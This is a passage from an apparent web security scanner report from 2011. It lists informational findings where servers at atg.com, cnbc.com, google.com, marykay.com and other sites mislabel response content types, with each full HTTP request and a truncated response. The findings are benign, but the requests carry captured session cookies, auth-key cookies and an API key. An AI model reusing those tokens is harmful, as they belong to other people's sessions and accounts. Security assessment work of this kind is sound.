Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=piy2pjshxmaa22dmacqth3bt

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:14:37 GMT
Content-Length: 101

Video Event: 1B862009340CE9937F3D91AB6CCA134E42777EEE - f979c890-22ec-412f-8e2c-df70d1568052 - oracle

31.81. http://subplyevents.cloudapp.net/AddEvent.aspx/DA52446C4D2F6699FE9CD584FA3631B533E893CE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

Summary

Severity:   Information
Confidence:   Firm
Host:   http://subplyevents.cloudapp.net
Path:   /AddEvent.aspx/DA52446C4D2F6699FE9CD584FA3631B533E893CE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null

Issue detail

The response contains the following Content-type statement: text/html; charset=utf-8. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /AddEvent.aspx/DA52446C4D2F6699FE9CD584FA3631B533E893CE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null HTTP/1.1
Host: subplyevents.cloudapp.net
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=piy2pjshxmaa22dmacqth3bt; path=/; HttpOnly
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:13:10 GMT
Content-Length: 101

Video Event: DA52446C4D2F6699FE9CD584FA3631B533E893CE - f979c890-22ec-412f-8e2c-df70d1568052 - oracle

31.82. http://tps31.doubleverify.com/visit.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://tps31.doubleverify.com
Path:   /visit.js

Issue detail

The response contains the following Content-type statement: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /visit.js?ctx=1135557&cmp=1135559&advid=1135558&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=6&plc=1398295&sid=interclk&adid=&&num=275&srcurl=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss%26categories%3Dexclude&curl=&qpgid=&referrer=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2Fcnbc%2F300x250%2Fatf%3Ft%3D1315339024254%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3DUniversalAudiencePlatform23.com%26refer%3Dhttp%253A%252F%252Fwww.cnbc.com%252F HTTP/1.1
Host: tps31.doubleverify.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=2733665-13225b1b58a-2854b473-10; __utma=209764608.1020985525.1314892399.1314892399.1314892399.1; __utmz=209764608.1314892399.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:267-HSA-807&token:_mch-doubleverify.com-1314892398926-27601

Response

HTTP/1.1 503 Service Unavailable
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:56:24 GMT
Connection: close
Content-Length: 27

The service is unavailable.

31.83. http://wd.sharethis.com/api/getCount2.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.tenzing.com%2Fatg-ecommerce-hosting.asp%3Futm_source%3DPG0008-ATG-Solutions%26utm_campaign%3D001%26utm_content%3D01%26utm_term%3D%252BATG%2520%252Bsolutions%26utm_medium%3DPPC HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 06 Sep 2011 15:32:10 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 250

(function(){stButtons.processCB({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.tenzing.com\/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm
...[SNIP]...

31.84. http://www.atg.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.atg.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.atg.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.1.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 19 Jul 2010 15:33:55 GMT
ETag: "60643-8f6-48bbf4be29ec0"
Accept-Ranges: bytes
Content-Length: 2294
Content-Type: text/plain; charset=UTF-8
Cache-Control: public, max-age=26796
Expires: Tue, 06 Sep 2011 22:59:07 GMT
Date: Tue, 06 Sep 2011 15:32:31 GMT
Connection: close

..............h...&...........h.......(....... ...........@....................]...R...u.......e.......Y...a...$...............$.......u.......4...........3...M...........)...Y.......A...............
...[SNIP]...

31.85. http://www.atg.com/svc-common/script/propertyFunc.js.jsp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.atg.com
Path:   /svc-common/script/propertyFunc.js.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /svc-common/script/propertyFunc.js.jsp HTTP/1.1
Host: www.atg.com
Proxy-Connection: keep-alive
Referer: http://www.atg.com/service/main.jsp?t=searchTab&dosearch=true&SearchButton=Find&searchstring=xss+faq+help&search=GO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Tue, 06 Sep 2011 15:35:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:35:19 GMT
Content-Length: 5890
Connection: close
Set-Cookie: JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22; Path=/

//*************************************************************************
//
// propertyfunc.js.jsp File
//
// (C) Copyright 1997-2009 ATG, Inc.
// All rights reserved.
//
// This page defines the p
...[SNIP]...

31.86. https://www.atg.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.atg.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 19 Jul 2010 15:33:55 GMT
ETag: "60643-8f6-48bbf4be29ec0"
Accept-Ranges: bytes
Content-Length: 2294
Content-Type: text/plain; charset=UTF-8
Cache-Control: public, max-age=86389
Expires: Wed, 07 Sep 2011 15:38:06 GMT
Date: Tue, 06 Sep 2011 15:38:17 GMT
Connection: keep-alive

..............h...&...........h.......(....... ...........@....................]...R...u.......e.......Y...a...$...............$.......u.......4...........3...M...........)...Y.......A...............
...[SNIP]...

31.87. https://www.atg.com/svc-common/script/propertyFunc.js.jsp

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.atg.com
Path:   /svc-common/script/propertyFunc.js.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /svc-common/script/propertyFunc.js.jsp HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: https://www.atg.com/service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Tue, 06 Sep 2011 15:37:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:37:31 GMT
Content-Length: 5890
Connection: keep-alive

//*************************************************************************
//
// propertyfunc.js.jsp File
//
// (C) Copyright 1997-2009 ATG, Inc.
// All rights reserved.
//
// This page defines the p
...[SNIP]...

31.88. http://www.cnbc.com/id/24596694/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cnbc.com
Path:   /id/24596694/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /id/24596694/?t=20118614565362 HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://media.cnbc.com/i/CNBC/Components/Promos/_app/promoBox_noBevelAuto.swf?delay=0&config=24596694&v=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-300; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; xaikeeperua=yes; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e084iWrP3zZjGLW8rjUsginb4%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FjEBYL11GHn8=; s_cc=true; s_sq=%5B%5BB%5D%5D; adops_master_kvs=; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:56:54 GMT
Via: 1.1 C aicache6
Content-Length: 1144
X-Aicache-OS: 65.55.53.237:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:57:00 GMT

<cnbcPromoSch>
<day name="monday">
<promoBlock start="0:00" end="3:00" id="24596692" />
<promoBlock start="3:01" end="24:00" id="24596685" />
</day>
<day name="tuesday">

...[SNIP]...

31.89. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php?api_key=17582a7e8baf4c60a804e1226949063d&extern=0&channel=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15837856%2Fsite%2F14081545%2F%3Ffbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/15837856/site/14081545/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.80.47
X-Cnection: close
Date: Tue, 06 Sep 2011 14:57:59 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

31.90. http://www.fekkai.com/js/imageLoader.json

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fekkai.com
Path:   /js/imageLoader.json

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /js/imageLoader.json HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.fekkai.com/flash/Fekkai_Equity_ImageLoader.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fekkai_flash_intro_cookie=True; __utma=243632410.331215175.1315345611.1315345611.1315345611.1; __utmb=243632410.1.10.1315345611; __utmc=243632410; __utmz=243632410.1315345611.1.1.utmcsr=fekkai.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:52 GMT
Server: Apache
Last-Modified: Thu, 25 Aug 2011 16:09:39 GMT
Accept-Ranges: bytes
Content-Length: 1055
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

{
"baseURL": "/flash/imageViewer/",
"images": [
{
"fileName": "image1.jpg",
"duration": "1.05",
"transition": "1"
},
{
"fileName": "image2.jpg",

...[SNIP]...

31.91. http://www.gillettevenus.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gillettevenus.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; __utmx=193945275.; __utmxx=193945275.; IPE_S_7929=7929; preferredLocale=en_US; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.3.9.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; bvgacefRatingsAndReviews=true

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:40 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a DAV/2 PHP/5.1.6
Last-Modified: Tue, 10 Feb 2009 20:48:09 GMT
ETag: "2392bc-47e-462969ad35440"
Accept-Ranges: bytes
Connection: close
Content-Type: text/plain
Content-Length: 1150

............ .h.......(....... ..... .....@....................r...s...s...s...t...s...x......w...x...x...w...r...o...m...k...l...k...m...m...n...s...[.z*...f
..v...s...t...n...m...k...h...h...h...h
...[SNIP]...

31.92. http://www.google.com/cse/api/008313234753726960933/cse/s6m3qtfkxlu/queries/js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /cse/api/008313234753726960933/cse/s6m3qtfkxlu/queries/js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /cse/api/008313234753726960933/cse/s6m3qtfkxlu/queries/js?callback=(new+PopularQueryRenderer(document.getElementById(%22queries%22))).render HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://support.bigcommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=UM-W7hk_5lna5JT_N9txdKVGnIyNY4wopCXXYtopjBtld5ONhmSDu6GJQ_In3uzA9a8cuXTpiucWjK0yk2HpxwRWas0z4viIZjV0bJJqE8Rpvlnnv4TJfoQ9H48sFabX

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:39:39 GMT
Expires: Tue, 06 Sep 2011 15:39:39 GMT
Cache-Control: private, max-age=86400
Content-Type: text/plain; charset=UTF-8
Content-Disposition: attachment
X-Content-Type-Options: nosniff
Server: pfe
Content-Length: 273
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


(new PopularQueryRenderer(document.getElementById("queries"))).render({
"title" : "BigCommerce Support",
"popularQueries" : [
{
"query" : "newsletter",
"num" : 10,
"href" : "http:\x2F\x2Fwww.google.c
...[SNIP]...

31.93. http://www.google.com/search

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /search

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: StnTz5pY
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=UM-W7hk_5lna5JT_N9txdKVGnIyNY4wopCXXYtopjBtld5ONhmSDu6GJQ_In3uzA9a8cuXTpiucWjK0yk2HpxwRWas0z4viIZjV0bJJqE8Rpvlnnv4TJfoQ9H48sFabX

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:31:49 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 36439

BfyINKgQ....S.......0..J...#.....%s#...ATG e-commerce solutio.7$..55DxmTvT1PKPXiALn1sCWCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid"))))a=a.parentNode;return b||google
...[SNIP]...

31.94. http://www.harbottle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.harbottle.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.harbottle.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:43:24 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Tue, 20 Mar 2007 19:17:21 GMT
ETag: "468027-9f6-8e129240"
Accept-Ranges: bytes
Content-Length: 2550
Connection: close
Content-Type: text/plain

..............h...&......... .h.......(....... ...................................4/..B=..OK..]Y..jg..xu..............................'"..S.k.i.n.s.\.N.e.w. .l.o.g.o.\.w.o.r.k. .P.L.E.S.K.\.i.c.o.\._.
...[SNIP]...

31.95. http://www.marykay.com/images/icn_fb.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.marykay.com
Path:   /images/icn_fb.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /images/icn_fb.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1769
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "bbc506621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=8AA5E3834817F20E05D692A6C10BEF9D; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:48 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

.PNG
.
...IHDR...z...$........4....gAMA......a.....tEXtSoftware.Adobe ImageReadyq.e<...{IDAThC.Z.oTE...mL0!.?@q%.*...    H"./h.W..D..l..}hY.(R............D....1-,&m.~....g......Z......3gf.............
...[SNIP]...

31.96. http://www.marykay.com/images/icn_yt.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.marykay.com
Path:   /images/icn_yt.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /images/icn_yt.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 3367
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "7797e6621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=34430B6646F0AFCCDB0A7A9022E2E592; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:48 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

.PNG
.
